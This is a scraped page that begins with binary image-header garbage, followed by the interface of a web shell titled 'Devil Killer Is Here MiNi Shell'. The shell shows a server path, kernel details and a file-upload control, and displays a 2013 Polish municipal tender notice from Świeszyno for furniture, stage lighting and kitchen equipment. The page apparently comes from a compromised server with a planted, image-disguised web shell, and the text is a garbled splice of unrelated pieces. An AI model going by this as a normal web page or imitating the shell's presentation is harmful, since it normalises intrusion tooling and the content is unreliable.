JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130403/129710-N-2013.html

<p class="kh_header"><b>Świeszyno: Doposażenie Gminnego Ośrodka Kultury w Świeszynie w ramach inwestycji Multimedialne centrum Kultury w Świeszynie e-Eureka</b><br>
<b>Numer ogłoszenia: 129710 - 2013; data zamieszczenia: 03.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie Gminnego Ośrodka Kultury w Świeszynie w ramach inwestycji Multimedialne centrum Kultury w Świeszynie e-Eureka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na  cztery części:
Cześć I:Oświetlenie sceniczne 
Statyw oświetleniowy z belką - 2 szt., Reflektor - naświetlacz, zmieniacz kolorów - 2 szt., Reflektor  - punktowy sceniczny, teatralny - 1 szt.
Cześć II: Meble świetlicowe i urządzenia biurowe
Worek typu Sako - 4 szt.,Krzesło konferencyjne bez podłokietników - 29 szt.,Składane stoły - 6 szt.,Stół konferencyjny - 1 kpl., Krzesła  - 25 szt., Niszczarka  - 1 szt.,System do zawieszania obrazów - ok.10szt., Zestaw do sprzątania - 1 szt.`
Cześć III: Wyposażenie kuchni
Kuchnia mikrofalowa - 1 szt.,Lodówka - 1 szt., Czajnik bezprzewodowy - 1 szt.,Zlewozmywak jednokomorowy z ociekaczem - 1 szt.,Patelnia śr.40cm - 1 szt.,Patelnia śr.36cm - 1 szt.,Komplet noży kuchennych - 1 kpl.,Frytkownica  - 1 szt.,Krajalnica do wędlin  - 1 szt.,Pojemniki ze stali nierdzewnej  - 1 kpl.,Garnek wysoki z pokrywką  - 1 szt.,Garnek wysoki z pokrywką  - 1 szt.,Garnek wysoki z pokrywką  - 1 szt.,Garnek wysoki z pokrywką  - 1 szt., Wózek do naczyń  - 1 szt.,Warnik - 1 szt.,   
Cześć IV: Meble na wymiar
Biurko w kształcie litery L - 3 szt., stolik okolicznościowy - 3 szt.,Szafa do zabudowy - 2 szt., Szafa do zabudowy - 1 szt., Szafa do zabudowy - 3 szt., Stolik dziecięcy - 1 szt., Regał  - 1 szt., Regał  - 1 szt., Regał  - 1 szt., Regał  - 2 szt.,Regał  - 1szt., Meble kuchenne - 1 kpl., Meble kuchenne -1 kpl., Szafa dwudrzwiowa - 2 szt., Wieszaki na ścianę - 2szt.,Ławka  - 1szt., Regał - 1szt.,Lustro - 1szt.m, Szafka od lustro - 1szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.52.70.00-6, 39.11.20.00-0, 39.15.00.00-8, 39.22.10.00-7, 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału na podstawie art. 22 ust. 1 ustawy pzp - załącznik nr 3 zawarty w części C.
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń potwierdzających spełnianie warunków określonych przez Zamawiającego, a wymaganych w rozdziale 9 SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie - załącznik nr 4 zawarty w części C;
Część 1. Nie dotyczy.
Część 2. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował minimum 2 zamówienia polegające na dostawie opisanego w tej części przedmiotu zamówienia o wartości brutto nie mniejszej niż 8 000,00 PLN każda i na ich potwierdzenie dołączy dokumenty potwierdzające, że zostały wykonane należycie.
Część 3. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował minimum 1 zamówienie polegające na dostawie opisanego w tej części przedmiotu zamówienia o wartości brutto nie mniejszej niż 5 000,00 PLN i na potwierdzenie dołączy dokumenty potwierdzające, że zostało wykonane należycie.
Część 4. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował minimum 2 zamówienia polegające na dostawie tego typu mebli, o wartości brutto nie mniejszej niż 20 000,00 PLN każda i na ich potwierdzenie dołączy dokumenty potwierdzające, że zostały wykonane należycie.
Oświadczenie Wykonawcy o spełnieniu warunków udziału na podstawie  art. 22 ust. 1 ustawy pzp - załącznik nr 3 zawarty w części C.
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń potwierdzających spełnianie warunków określonych przez Zamawiającego, a wymaganych w rozdziale 9 SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału na podstawie  art. 22 ust. 1 ustawy pzp - załącznik nr 3 zawarty w części C;
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń potwierdzających spełnianie warunków określonych przez Zamawiającego, a wymaganych w rozdziale 9 SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału na podstawie  art. 22 ust. 1 ustawy pzp - załącznik nr 3 zawarty w części C.
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń potwierdzających spełnianie warunków określonych przez Zamawiającego, a wymaganych w rozdziale 9 SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału na podstawie  art. 22 ust. 1 ustawy pzp - załącznik nr 3 zawarty w części C.

Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń potwierdzających spełnianie warunków określonych przez Zamawiającego, a wymaganych w rozdziale 9 SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Karty katalogowe, ewentualne pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art.144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
-zmianą stawki podatku od towarów i usług VAT lub narzuceniem innych obciążeń publiczno - prawnych związanych z asortymentem będącym przedmiotem umowy;
- zmiana terminy realizacji umowy, gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna , ekonomiczna lub techniczna, za którą żadne ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ
- zmiana parametrów przedmiotu zamówienia, ze względu na nowe okoliczności, które zaistniały podczas wykonywania umowy, a zmiany te są niezbędne do poprawnego funkcjonowania przedmiotu zamówienia,
- zmianą osób uprawnionych do kontaktowania się Zamawiającego z Wykonawcą.
B.Określa się następujący tryb dokonywania zmian postanowień umowy:
-Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,
-Zamawiający wnioskuje, aby Wykonawca przedłożył propozycję zmiany,
-Wykonawca wnioskuje do Zamawiającego o dokonanie wskazanej zmiany.
C. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach - notatka służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga zatwierdzenia przez Zamawiającego, itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno, 
76-024 Świeszyno 71,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2013 godzina 12:00, miejsce: Urząd Gminy Świeszyno, 
76-024 Świeszyno 71,
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oświetlenie sceniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Statyw oświetleniowy z belką - 2 szt.Statyw oświetleniowy w zestawie z belką do montażu lamp o długości 100cm. Wysokość min.2850mm.

Reflektor - naświetlacz, zmieniacz kolorów - 2 szt.4 kolory podstawowe - filtry dichro: czerwony, zielony, niebieski, żółty; żarówki 4x500W/230V; tryby sterowania: Praca na muzykę bez sterownika, Master/Slave, DMX 512, sterowanie DMX; uniwersalne mocowanie - możliwość użycia bez statywu, wymiary 45x27x18cm;  w komplecie okablowanie. 

Reflektor  - punktowy sceniczny, teatralny - 1 szt.Reflektor sceniczno- estradowy z regulowanym płynnie kątem świecenia na żarówki halogenowe typu 650, lub 1000Wat/ 230V z cokołem GX 9,5 z soczewką o miękkim świetle typu Fresnel. Kąt świecenia od 10 do 40 stopni. Ramka filtru w komplecie. Zasilanie: 230 V AC, 50 Hz. Pobór mocy min. 1010 W; w komplecie z okablowaniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.70.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Meble świetlicowe i urządzenia biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worek typu Sako - 4 szt.Wymiary: wysokość 110 cm, podstawa 70 cm, wypełniona granulatem, wykonanie w 100% z poliestru, Atest Państwowego Zakładu Higieny
Kolor - czerwony, 

Krzesło konferencyjne bez podłokietników - 29 szt.Stelaż, wykonany z profili stalowych w kolorze czarnym, konstrukcja 4-nogi, możliwość składowania w stosie do 10szt. Miękkie, tapicerowane siedzisko i oparcie, stopki chroniące podłogi przed  zarysowaniami. Kolor tapicerki: czarny

Składane stoły - 6 szt. Wymiary stołów: 130X80 Blaty o łącznej grubości 36 mm, oklejony obrzeżem PCV o gr. 2mm o wysokiej klasie ścieralności., zabezpieczony przed zarysowaniami. Wewnątrz pogrubienia blatu wzdłuż dłuższych krawędzi blat wzmocniony stalowymi płaskownikami Nogi wykonane z profili stalowych o wymiarach 40x20 mm i 30x20mm, zakończone zaślepkami z tworzywa sztucznego do zabezpieczenia przed zarysowaniami.
Stół wyposażony w mechanizm składający nogi - click z zaczepem oraz zabezpieczenia przed niekontrolowanym złożeniem. Kolor olcha. Możliwość sztaplowania max 10 szt.

Stół konferencyjny - 1 kpl. Stół w kształcie elipsy o wymiarach dł. min.5,15m szer. min 1,60 z pozostawionym na środku miejscem na kable, złożony ze stołów 130X80 o parametrach jw.
 
Krzesła  - 25 szt. Krzesło drewniane tapicerowane szenilem, kolor tapicerki jednolity do uzgodnienia z Zamawiającym,  przykładowe wymiary: 46/45/96 cm, stelaż brzoza 

Niszczarka  - 1 szt.Funkcja automatycznego start-stopu, funkcja cofania, Gwarancja: 2 lata na całość urządzenia, 5 lat na noże tnące, Niszczy jednorazowo do 10 kartek, ze spinaczami oraz karty kredytowe i płyty CD/DVD, Kosz o pojemności min.23 litrów

System do zawieszania obrazów - ok.10szt. Specjalny system do zawieszania obrazów bez wiercenia, składający się z szyny oraz linek. Szyna podsufitowa, łatwa w montażu o długości min.200 cm, materiał: aluminium, kolor: biały/aluminium do uzgodnienia z Zamawiającym. Linki stalowe lub nylonowe do zawieszania obrazów w zestawie obciążenie max do 25 kg/mb.

Zestaw do sprzątania - 1 szt.wyposażenie standardowe:
podstawa  na kółkach, 4 x uchwyt worka 2 x wiadro 20 l, prasa do wyciskania ,  koszyk z wiaderkiem 6 l, worek 120 l, wkład kieszeniowy bawełna lub poliester szt 2 oraz wkład kieszeniowy mikrofaza szt.2, mop ze stelażem uniwersalnym szt.2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.20.00-0, 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kuchnia mikrofalowa - 1 szt.Pojemność  min 23 litry, moc mikrofal  min.800 W. Sterowanie  elektroniczne. Funkcje podstawowe  gotowanie, grill, podgrzewanie, rozmrażanie.   Automatyczny dobór czasu  gotowania, podgrzewania, rozmrażania. System rozprowadzania mikrofal  przestrzenny. Funkcje dodatkowe, funkcja kombi, szybkie podgrzewanie, timer . Wykończenie wnętrza  emalia ceramiczna.

Lodówka - 1 szt.Chłodziarka z wewnętrznym zamrażalnikiem, pojemność użytkowa chłodziarki min.100l,natomiast zamrażalnika min.15 l, z automatycznym rozmrażaniem, powłoką antybakteryjną. Klasa energetyczna  A++ . Możliwość przekładania drzwi, sterowanie mechaniczne , automatyczne rozmrażanie. Poziom hałasu ok. 39 dB.

Czajnik bezprzewodowy - 1 szt.Czajnik o mocy min.2400 W, pojemności min.1.7 l, z ukrytą grzałką ze stali nierdzewnej oraz z automatycznym wyłączeniem po zagotowaniu. Rączka czajnika się nie nagrzewa , zabezpieczenie przed włączeniem pustego czajnika, wyłączenie po zdjęciu z podstawy, zabezpieczenie przed przypadkowym otwarciem pokrywki, obrotowa podstawa.

Zlewozmywak jednokomorowy z ociekaczem - 1 szt.Wykonanie ze stali nierdzewnej, z syfonem i z ociekaczem,  do wbudowania, Wymiar 58x50.

Patelnia śr.40cm - 1 szt.Profesjonalna patelnia wykonana z twardego odlewu aluminium, pokryta powłoką tytanową z powierzchnią nieprzywierającą, rączki patelni wykonane ze stali nierdzewnej 18/10, nie nagrzewają się

Patelnia śr.36cm - 1 szt.Profesjonalna patelnia wykonana z twardego odlewu aluminium, pokryta powłoką tytanową z powierzchnią nieprzywierającą, rączki patelni wykonane ze stali nierdzewnej 18/10, nie nagrzewają się.

Komplet noży kuchennych - 1 kpl.Noże o ergonomicznej rękojeści,  ostrze ze stali chromowo-molibdenowej twardości ok. 54-56 HRC, można myć w zmywarce i wyparzać.

Frytkownica  - 1 szt.Jednokomorowa o pojemności min.8l 

Krajalnica do wędlin  - 1 szt.Minimalna moc 320 W, zasilanie:230 V, silnik chłodzony powietrzem, bezpieczne włączanie i wyłączanie , odkręcana prowadnica ułatwiająca czyszczenie z resztek pozostałych po krojeniu, osłona na nóż, wbudowana ostrzałka,wysokiej jakości nóż ustawiony skośnie o średnicy 250 mm, płynna regulacja grubości plastrów 

Pojemniki ze stali nierdzewnej  - 1 kpl.
                             
Garnek wysoki z pokrywką  - 1 szt.poj. 50l, wymiary 400x400, stal chromowo - niklowa 18/10, powierzchnia zewnętrzna satynowa z polerowanym rantem, wielowarstwowe dno typu sandwitch , nienagrzewające się rączki

Garnek wysoki z pokrywką  - 1 szt.poj. 37l, wymiary 360x360, stal chromowo - niklowa 18/10, powierzchnia zewnętrzna satynowa z polerowanym rantem, wielowarstwowe dno typu sandwitch  nienagrzewające się rączki

Garnek wysoki z pokrywką  - 1 szt.poj. 24l, wymiary 320x300, stal chromowo - niklowa 18/10, powierzchnia zewnętrzna satynowa z polerowanym rantem, wielowarstwowe dno typu sandwitch  nienagrzewające się rączki

Garnek wysoki z pokrywką  - 1 szt.poj. 16l, wymiary 280x260,, stal chromowo - niklowa 18/10, powierzchnia zewnętrzna satynowa z polerowanym rantem, wielowarstwowe dno typu sandwitch  nienagrzewające się rączki

Wózek do naczyń  - 1 szt.Wykonany ze stali nierdzewnej z trzema półkami ze stali chromowej wyłożone od spodu materiałem dźwiękochłonnym. Maksymalne obciążenie półki - 75 kg. Posiada 4 skrętne kółka, min. 2 hamulce oraz zaokrąglone krawędzie.

Warnik - 1 szt.Warnik o pojemności min.10l. Pojedyncze ścianki wykonane ze stali nierdzewnej wysokopolerowanej, czas gotowania max 50 min,  regulacja temperatury 30 °C - 100 °C, ochrona przed włączeniem na sucho, zasilanie 230V, wskaźnik poziomu napełnienia, grzałka zabudowana, bezkroplowy kranik. Urządzenie można stosować do wody, wina i piwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.10.00-7.</p></li>
